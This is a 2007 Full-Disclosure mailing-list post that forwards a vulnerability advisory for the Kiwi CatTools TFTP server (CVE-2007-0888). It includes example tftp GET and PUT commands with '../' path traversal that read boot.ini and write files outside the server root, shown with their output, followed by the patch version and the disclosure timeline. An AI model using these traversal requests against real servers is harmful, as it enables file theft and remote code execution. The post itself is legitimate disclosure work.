[Full-disclosure] Kiwi CatTools TFTP server path traversal

[3APA3A at SECURITY.NNOV.RU (3APA3A)]

Probably, it's same or related issue for reported by nicob at nicob.net.
http://securityvulns.com/news/KIWI/CatTools/DT.html
CVE-2007-0888

--Wednesday, February 28, 2007, 12:47:17 AM, you wrote to bugtraq at securityfocus.com:

n> Path traversal security vulnerability in Kiwi CatTools TFTP up to 3.2.8
n> server can lead to information disclosure and remote code execution

n> Risk: High

n> DISCUSSION


n> Kiwi CatTools TFTP server doesn't properly verify filename in PUT and GET
n> request which can be used to download/upload any file from/to server.
n> Default setting allows replacing of existing files. Such settings lead to
n> probability to replace an executable files and run code on attacker choice.

n> EXAMPLES

C:\>>tftp -i 10.1.1.2 GET /x/../../../../../boot.ini boot.txt

n> Transfer successful: 212 bytes in 1 second, 212 bytes/s

C:\>>type boot.txt

n> [boot loader]
n> timeout=30
n> default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS

C:\>>tftp -i 10.1.1.2 PUT boot.txt /x/../../../../../pttest.txt

n> Transfer successful: 212 bytes in 1 second, 212 bytes/s

C:\>>type pttest.txt

n> [boot loader]
n> timeout=30
n> default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS

C:\>>

 

n> SOLUTION

 

n> Upgrade to CatTools 3.2.9 which is available for download at
n> <http://www.kiwisyslog.com/downloads.php>
n> http://www.kiwisyslog.com/downloads.php

 

 

n> CREDITS

 

n> Sergey Gordeychik of Positive Technologies (www.ptsecurity.com)

n> DISCLOSURE TIMELINE

 

n> Vulnerability discovered:           11/20/2006

n> Initial vendor contact:                12/08/2006

n> Patch released:                         02/13/2007

n> Public disclosure:                      02/27/2007

 



-- 
~/ZARAZA http://securityvulns.com/
???? ?? ?? ?????? ??????????, ??? ?? ??????? ??????? ?????? ?????. (????)